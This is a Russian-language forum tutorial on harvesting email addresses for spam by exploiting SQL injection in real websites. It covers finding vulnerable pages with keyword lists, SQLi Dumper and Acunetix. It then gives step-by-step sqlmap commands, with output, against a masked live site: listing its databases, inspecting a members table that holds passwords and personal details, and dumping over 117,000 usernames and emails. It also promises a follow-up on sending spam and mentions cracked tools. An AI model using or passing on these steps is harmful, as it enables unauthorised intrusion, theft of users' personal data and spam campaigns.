SQLi и с чем его едят (2019)

Дело было зимой, делать было нечего. Решил я разобраться как люди спамят.
Если театр как известно начинается с вешалки то спам начинается с свежих баз и в этой главе я постараюсь описать один способ из миллиона других как добываются свежие спам базы.

И так начнём.

Сразу скажу для ярых критиков что данное HoWTo собрано из множества других которых я нашел и собрал в один на безграничных просторах интернета и для продвинутого спамера/хакера никакой смысловой нагрузки не несёт.

1) С начала переходим на keywordtool.io/google и генерируем лист для поиска нужной нужной нам скули. В моём случаи это "search work", сохраняем это список в буфер при помощи "Copy All".

2) Стартуем "SQLi Dumper". Сначала хотел наделать скринов но потом передумал потому что ин получается много но думаю там разобраться не сложно. Выглядит дампер так:

https://3.bp.blogspot.com/-H6bfin_fI…er%2Bv.8.2.png

2а) Копируем лист запросов в табличку по центру и выбераем "Automated" автоматизированый поиск. В принчипе всё, дампер начинает работать. В закладе "Injectables" будут складываться автоматом скули что он сможет найти.
Сразу хочу заметить что SQLi Dumper работает очень поверхностно и то что он не может сломать скрадывает в закладки "Not Injectables". Если там есть какие то вкусные страницы можно попробoвать следующий пункт.

3) Запускаем "Acunetix", выглядит он так

https://www.helpnetsecurity.com/imag…7-04-large.jpg

3а) Кликаем на "New Scan", выбераем "SQL Injection" как Target выбераем Url с закладки дампера "Not Injectables" нажимаем на Finish. По своему опыту добавлю что именно эта программа приносила мне более интересные результаты.

4) И так и нас есть пачка скулек. Надо их сдампить. Для винды есть прога Havij, но она не развивается с 2012 и как по мне sqlmap с консоли даёт больше свободы.

4а) Ишем мылo в базе данных:

Код:
sqlmap -u "********www.XXXXX.com/currency.php?work="

available databases [10]:[*] account_selling[*] gp_central[*] gp_phpb1[*] gp_plcalc[*] gp_vendor[*] host100_horde[*] information_schema[*] new_internal[*] psa[*] ticket

4b) Идём в базу gp_central и просматриваем таблицы

Код:
sqlmap -u "********www.XXXXX.com/currency.php?work=" --batch -D gp_central --tables --count

Database: gp_central
+-------------------------+---------+
| Table         | Entries |
+-------------------------+---------+
| gpcart_logs   | 5225350 |
| login_logs    | 1529929 |
| cobrand_login_logs    | 1071497 |
| gpcart        | 506064 |
| ordermsgs     | 412903 |
| members       | 176120 |

...

| cobrand_members       | 152500 |
| pl_messages   | 150863 |
| members_groups        | 3
| news  | 1
+-------------------------+---------+

4c) смотрим что есть в members таблице

Код:
sqlmap -u "********www.XXXXX.com/currency.php?work=" --batch -D gp_central -T members --columns

Database: gp_central
Table: members
[29 columns]
+----------------+---------------------+
| Column | Type |
+----------------+---------------------+
| areacode | varchar(6) |
| category | varchar(12) |
| cellnumber | varchar(25) |
| city | varchar(50) |
| commissionrate | float |
| confirm | char(2) |
| country | varchar(128) |
| countrycode | varchar(6) |
| email | varchar(128) |
| firstname | varchar(64) |
| gpdollars | float |
| homenumber | varchar(25) |
| id | int(11) |
| intl_number | varchar(16) |
| joindate | varchar(32) |
| lastname | varchar(64) |
| local_3 | char(3) |
| local_4 | varchar(4) |
| mailconfirmed | varchar(11) |
| migrated | tinyint(1) |
| newsletter | char(2) |
| password | varchar(32) |
| points | int(11) |
| state | varchar(25) |
| street | varchar(50) |
| street2 | varchar(50) |
| username| varchar(128) |
| vendor | tinyint(3) unsigned |
| zip | varchar(15) |
+----------------+---------------------+

4d) Вся инфа что нам надо у нас теперь есть, теперь дампим сам дамп.

Код:
sqlmap -u "********www.XXXXX.com/currency.php?work=" --batch –D gp_central -T members -C username,email --dump

[22:05:46] [INFO] fetching entries of column(s) 'email, username' for
table 'members' in database 'gp_central'
[22:05:47] [WARNING] reflective value(s) found and filtering out
[22:05:47] [INFO] used SQL query returns 117120 entries
[22:05:49] [INFO] retrieved: "[email protected]", "awerty1"
[22:05:50] [INFO] retrieved: "[email protected]","joberi3"

Как бы всё. Теперь дело за малым, email и username у нас есть чтобы сделать HTML письмо. Как именно спамить я расскажу в второй части.

Всем спасибо за внимание!

ПС: Софт и кряки не выкладываю потому что скачал их с интернета и за их чистоту не могу нести гарантию. Но найти их особого труда мне не составило…

Оставьте комментарий